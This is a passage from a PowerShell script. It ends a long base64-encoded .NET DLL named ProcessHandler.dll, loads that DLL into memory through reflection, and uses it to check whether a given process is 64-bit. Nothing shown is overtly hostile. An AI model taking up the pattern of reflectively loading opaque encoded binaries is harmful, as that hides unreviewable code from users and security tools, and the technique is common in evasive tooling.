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"
|
|
$dllbytes = [System.Convert]::FromBase64String($ps)
|
|
$assembly = [System.Reflection.Assembly]::Load($dllbytes)
|
|
}
|
|
|
|
$processHandle = (Get-Process -id $processID).Handle
|
|
$is64 = [IntPtr]::Zero
|
|
try{
|
|
[ProcessHandler]::IsWow64Process($processHandle, [ref]$is64) |Out-Null
|
|
} catch {
|
|
|
|
}
|
|
$is64
|
|
|
|
}
|